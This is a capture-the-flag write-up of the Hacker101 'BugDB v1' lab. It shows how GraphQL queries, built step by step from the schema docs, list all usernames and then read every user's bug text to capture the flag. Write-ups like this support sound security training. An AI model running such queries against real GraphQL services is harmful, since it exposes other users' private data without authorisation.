ctf.hacker101 — BugDB v1

We are starting our exercise with GO option at the end of the exercise title on https://ctf.hacker101.com/ctf

There is an empty GraphQL[1] screen to solve the exercise and we read the “DOCS” files step by step on the right side of the exercise.
We start to write our own query with a unique name. Of course, there is no result for our query because of it is empty.

query tumkullanicilar{
}

In the reference files, we have a lots of fields to select. We choose the “allUsers” to find all users information.
Under “allUsers” tab we have “UserConnection” and “Arguments” section and continue with “UserConnection”, know we have “pageInfo: PageInfo!” which is related to pagination and “edges: [UsersEdge]!” which has nodes for another information.
And we select the “node: Users” because we think that it could be related with users information, we see “implements” section “fields” sections.
On the “id” section there is two option and we decided to continue with “username: String”

Finally, our query looks like

query tumkullanicilar{
 allUsers{
  edges{
   node{
   id:username
   }
  }
 }
}

And the result is

{
 “data”: {
  “allUsers”: {
   “edges”: [
    {
     “node”: {
     “id”: “admin”
     }
    },
    {
     “node”: {
     “id”: “victim”
     }
    }
   ]
  }
 }
}

But there is no any information what we are looking for so that we changed the query step by step verse.
First of all, we go back one step and changed the node selection with the second choice “bugs”, under “bugs” there is a “BugsConnection”
We have a knowledge from the “UserConnection” to select “node: Users” and then we select “node: Bugs_”
On the “id” section there is a lot of options and we decided to continue with “text: String”

And our new query is

query tumkullanicilar{
 allUsers{
  edges {
   node{
    bugs{
     edges{
      node{
       id: text
      }
     }
    }
   }
  }
 }
}

RESULT: The flag was captured.

REFERENCES
[1] GraphQL IDE Monorepo, https://github.com/graphql/graphiql